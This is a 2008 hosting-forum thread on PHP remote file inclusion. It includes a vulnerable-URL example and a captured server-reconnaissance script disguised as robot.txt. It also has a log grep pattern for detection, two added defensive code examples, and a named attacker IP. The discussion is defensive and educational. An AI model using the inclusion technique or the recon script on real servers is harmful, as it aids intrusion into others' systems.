|
8th June 2008, 11:53 AM
|
#2 (permalink)
| | Administrator
Join Date: Oct 2002 Location: London, UK
Posts: 8,103
| Most attacks do not necessarily have anything to do with a comments script.
Any php script at all is at risk. 1 line of insecure code can lead to someone being able to inject malicious code into the page and execute it as your site's user. It does not have to be a comment or email script in order for someone to achieve this, just poor or insecure coding of any type.
__________________ . Matt
UnitedHosting Staff For official support please use our helpdesk at UnitedSupport.co.uk UnitedHosting proudly hosting more than 20,000 sites since 1998. |
| |
8th June 2008, 11:56 AM
|
#3 (permalink)
| | Registered User
Join Date: Mar 2005
Posts: 148
| By php script, you mean client-side PHP, right? |
| |
8th June 2008, 12:05 PM
|
#4 (permalink)
| | Administrator
Join Date: Oct 2002 Location: London, UK
Posts: 8,103
| I mean legitimate php scripts installed on the web hosting account of someone such as yourself.
Should something on that script be insecure, or out-dated, then it would likely be found and abused by a hacker to inject malware or spam scripts into your hosting account and executed.
| |
8th June 2008, 01:20 PM
|
#5 (permalink)
| | Registered User
Join Date: Mar 2005
Posts: 148
| Sorry for being so ignorant...
So, I would have to have a PHP script in my client-side page code, which would send requests to the PHP script on the server, and that could then be abused?
If there is no server-side PHP "receiver" then I'm safe? |
| |
8th June 2008, 01:39 PM
|
#6 (permalink)
| | Registered User
Join Date: Feb 2006 Location: London, UK
Posts: 263
| php is a server side script language and does not run on client side. basically if your site on the server does not use any php script at all then you do not need to be concerned about any php hack. full stop.
php would only cause harm on the server, whereas client-side scripting language such as javascript could cause harm to a user's local pc.
Php is not the only website scripting language that could be open to abuse, in fact no one can say any language is 100% secure and hack-free - it is a matter that the loophole has not been discovered as yet. there is always someone out there looking for these loopholes either to exploit (bad guys), or to plug (good guys). It is something we will have to live with just like all the evil things in a society. |
| |
8th June 2008, 03:51 PM
|
#7 (permalink)
| | Registered User
Join Date: Mar 2005
Posts: 148
| If I have a page which contains a PHP include (file) statement, that runs entirely on the server, and does not even appear in the client's browser source, right?
Is this then, somehow, vulnerable?
What is an example of a PHP vulnerability, if the client-side web page does not access PHP on the server?
Is "enabling" PHP on the server enough to make your site vulnerable? How? |
| |
8th June 2008, 04:23 PM
|
#8 (permalink)
| | Registered User
Join Date: Feb 2006 Location: London, UK
Posts: 263
| in order to exploit a php vul., you would normally need to use a specially crafted url which would result in some scripts (mysql query for example) being executed on the server that hosts the website that uses php as its scripting language. real world examples include stealing customer data. if your site does not use mysql then there is no worry about this type of hack. another could be writing or attaching some scripts at the end of a php file on the server but I don't think this is likely to happen on UH servers due to strict write permissions.
php only runs on the server using the php engine on the server, which generates the html code and sends it to the client's browser so that it can display it. No browser understands php. |
| |
8th June 2008, 08:33 PM
|
#9 (permalink)
| | Administrator
Join Date: Oct 2002 Location: London, UK
Posts: 8,103
| One of the most common examples is where people use URLs on their site such as this: www.mysitenamehere.com/page.php=index
and www.mysitenamehere.com/page.php=aboutus
If the underlying code does not sanitise the input here then hackers simply need to hit in a browser something like: http://www.mysitenamehere.com/page.p.../badscript.php
Thus injecting the badscript.php code into the mysitenamehere.com web server and executing it by visiting that page in a browser.
That's the simplest most common example I can come up with. Remember page.php seems harmless and is not an email or contact script, yet it has been made insecure and dangerous.
| |
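The unsanitised page parameter described in post #9, shown with a fixed form, as an added example that is not part of the original posts. The parameter name `page`, the `pages/` directory, the page list and the function `resolve_page` are assumptions made for illustration.

```php
<?php
// Added example, not code from the thread. The "page" parameter, the pages/
// directory and resolve_page() are hypothetical names chosen for illustration.

// The risky pattern hands the request value straight to include:
//     include($_GET['page'] . '.php');
// With the php.ini setting allow_url_include enabled, a URL in that value is
// fetched and executed as PHP. With it disabled, "../" sequences can still
// reach other local files, so the setting alone is not the fix.

const PAGES_DIR = __DIR__ . '/pages';

// Fixed allowlist: request value => file on disk. Nothing else is ever included.
const PAGES = [
    'index'   => 'index.php',
    'aboutus' => 'aboutus.php',
];

/**
 * Map a requested page name to a file path, or null when it is not allowed.
 */
function resolve_page($requested): ?string
{
    if (!is_string($requested)) {          // ?page[]=x arrives as an array
        return null;
    }
    if (!array_key_exists($requested, PAGES)) {
        return null;                       // URLs, ../ paths, unknown names
    }
    return PAGES_DIR . '/' . PAGES[$requested];
}

// In page.php the lookup replaces the direct include:
//     $file = resolve_page($_GET['page'] ?? 'index');
//     if ($file === null) { http_response_code(404); exit; }
//     include $file;

// Constructed sample inputs showing what is accepted and what is refused.
$samples = ['index', 'aboutus', 'http://example.invalid/badscript',
            '../../etc/passwd', ['x']];
foreach ($samples as $s) {
    $path = resolve_page($s);
    printf("%-40s => %s\n", json_encode($s, JSON_UNESCAPED_SLASHES),
           $path ?? 'rejected');
}
```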
8th June 2008, 08:59 PM
|
#10 (permalink)
| | Registered User
Join Date: Sep 2007 Location: 17°59′N 76°48′W
Posts: 150
| Quote:
Originally Posted by UH-Matt | Thanks for the great example Matt! |
| |
11th June 2008, 12:55 AM
|
#11 (permalink)
| | Registered User
Join Date: Feb 2006 Location: London, UK
Posts: 263
| I just caught one real life example today - an utterly stupid person may just learn something from here and tried to get his hands dirty (except that he did not get what he wanted): the robot.txt is in fact a php file trying to steal some server info:
PHP Code:
<?php
function ConvertBytes($number)
{
$len = strlen($number);
if($len < 4)
{
return sprintf("%d b", $number);
}
if($len >= 4 && $len <=6)
{
return sprintf("%0.2f Kb", $number/1024);
}
if($len >= 7 && $len <=9)
{
return sprintf("%0.2f Mb", $number/1024/1024);
}
return sprintf("%0.2f Gb", $number/1024/1024/1024);
}
echo "^bryan_ae1^<br>";
$un = @php_uname();
$up = system(uptime);
...
echo "bryan_ae1 was here ..<br>";
echo "uname -a: $un<br>";
echo "os: $os<br>";
echo "uptime: $up<br>";
echo "id: $id1<br>";
echo "pwd: $pwd1<br>";
echo "php: $php1<br>";
echo "software: $sof1<br>";
echo "server-name: $name1<br>";
echo "server-ip: $ip1<br>";
echo "free: $free<br>";
echo "used: $used<br>";
echo "total: $all<br>";
exit;
?>
that person was using a London based IP: 62.128.131.80
who obviously had access to the site freelance.eu, the details of which is: Quote:
| maybe UH could make a complaint to that hosting company?
Last edited by pursuit : 11th June 2008 at 01:12 AM.
Reason: i had a second thought and deleted part of the php code.
|
| |
11th June 2008, 01:10 AM
|
#12 (permalink)
| | Administrator
Join Date: Oct 2002 Location: London, UK
Posts: 8,103
| If we complained about every attempt that was made we would be complaining 1000 times a day. Those involved soon find out quickly enough.
These things are literally occurring thousands of times a day across our IP ranges, it's very very common.
A good way to find them is to grep your sites access log for:
?=http
This will show up any access lines like the example provided.
| |
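The access-log search suggested in post #12, as an added example that is not part of the original posts. It goes beyond the literal grep pattern by checking only the request field and by decoding percent-encoded values first; the log lines, addresses and host names are constructed samples, and `find_url_in_params` is a hypothetical helper name.

```php
<?php
// Added example, not code from the thread. Log lines are constructed samples
// in Apache "combined" format; addresses come from documentation ranges.

/**
 * Return the log lines whose request target carries a URL as a parameter
 * value, e.g. page.php?page=http://host/file or its percent-encoded form.
 */
function find_url_in_params(array $lines): array
{
    $hits = [];
    $n = 0;
    foreach ($lines as $line) {
        $n++;
        // The request is the first quoted field: "METHOD target PROTOCOL".
        if (!preg_match('/"[A-Z]+ (\S+) HTTP\/[\d.]+" (\d{3})/', $line, $m)) {
            continue;
        }
        // Decode twice so =http%3A%2F%2F and double-encoded values are seen.
        $target = rawurldecode(rawurldecode($m[1]));
        if (preg_match('/=\s*(?:https?|ftp):\/\/([^\s\/?&]+)/i', $target, $u)) {
            $hits[] = [
                'line'        => $n,
                'client'      => strtok($line, ' '),
                'status'      => (int) $m[2],   // 200 deserves the first look
                'remote_host' => $u[1],
            ];
        }
    }
    return $hits;
}

// Constructed sample log. Line 4 has "http://" only in the referer field,
// which a whole-line search could confuse with the request itself.
$log = [
    '203.0.113.7 - - [11/Jun/2008:00:41:02 +0100] "GET /page.php?page=aboutus HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.23 - - [11/Jun/2008:00:41:09 +0100] "GET /page.php?page=http://files.example.invalid/robot.txt HTTP/1.1" 200 312 "-" "libwww-perl/5.805"',
    '198.51.100.23 - - [11/Jun/2008:00:41:11 +0100] "GET /page.php?page=http%3A%2F%2Ffiles.example.invalid%2Frobot.txt HTTP/1.1" 404 210 "-" "libwww-perl/5.805"',
    '203.0.113.7 - - [11/Jun/2008:00:42:30 +0100] "GET /index.html HTTP/1.1" 200 1043 "http://www.example.org/?ref=home" "Mozilla/5.0"',
];

foreach (find_url_in_params($log) as $hit) {
    printf("line %d  client %s  status %d  remote host %s\n",
           $hit['line'], $hit['client'], $hit['status'], $hit['remote_host']);
}
```

Legitimate redirect or return-URL parameters will also match, so hits need a look at the script and status code before being treated as an inclusion attempt.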
11th June 2008, 08:43 AM
|
#13 (permalink)
| | Registered User
Join Date: Feb 2006 Location: London, UK
Posts: 263
| probably not worth it for all such (illegal) activities, not even this case where the hacking script is hosted by the Dutch. had it been in the UK I would personally make a complaint because this could amount to criminal offense under UK law for the parties involved - the hacker, the hosting company of the hacking scripts and even the ISP (the last two if notified but fail to take action).
the stupidity of this case is that the person seems to act like a burglar who leaves his name/address at the crime scene. |
| |
11th June 2008, 08:47 AM
|
#14 (permalink)
| | Administrator
Join Date: Oct 2002 Location: London, UK
Posts: 8,103
| Quote: |
the stupidity of this case is that the person seems to act like a burglar who leaves his name/address at the crime scene.
| Not really, that's why I was going to suggest you remove some of that information.
There is a very high chance that the IP used for the hack is actually just another hacked IP that the hacker is using as a proxy.
They link up 5, or 10, or 15 different hacked systems and proxy via each one to hack further IPs. This hides their steps and reduces the chance of being caught, while adding to the number of hacked systems they have access to.
The IP they used to attempt to hack your site is probably another innocent site or person's broadband connection, who happened to actually have a vulnerability to allow the hacker in, and now the hacker is running the same hack scans from that hacked connection.
| |
11th June 2008, 10:18 AM
|
#15 (permalink)
| | Registered User
Join Date: Feb 2006 Location: London, UK
Posts: 263
| i was referring to the freelance.eu site that the hacking script was hosted, unless that site had been hacked in which case i think maybe i could do them (the hosting company) a favour to let them know.
yes i knew the ip seemed to be from London but the ISP (host) was a French one, an indication what Matt said. I log this info on selected sites, not for this purpose though. |
| |
11th June 2008, 10:22 AM
|
#16 (permalink)
| | Administrator
Join Date: Oct 2002 Location: London, UK
Posts: 8,103
| Yes even the hosting account that the hacking script is hosted on is likely a hacked account.
Once they had managed to place a script onto your space, the next site they try to hack would likely do a call to your own site with that script and so on and so on...
| |
23rd July 2008, 12:00 PM
|
#17 (permalink)
| | Registered User
Join Date: Jul 2008
Posts: 37
| I was recently alerted to a possible compromise on one of the sites belonging to Harper Collins, the publishers. I use Kaspersky, went to check and the page in question triggered off a trojan downloader alert. Upon investigation, there was indeed javascript code within that page that contained the malware that shouldn't have been there. I contacted their IT department, and within a few hours the exploit had been removed.
So yes, legitimate sites can hold malware, but I think that's more to do with how secure those servers/sites are in the first place. |
| | |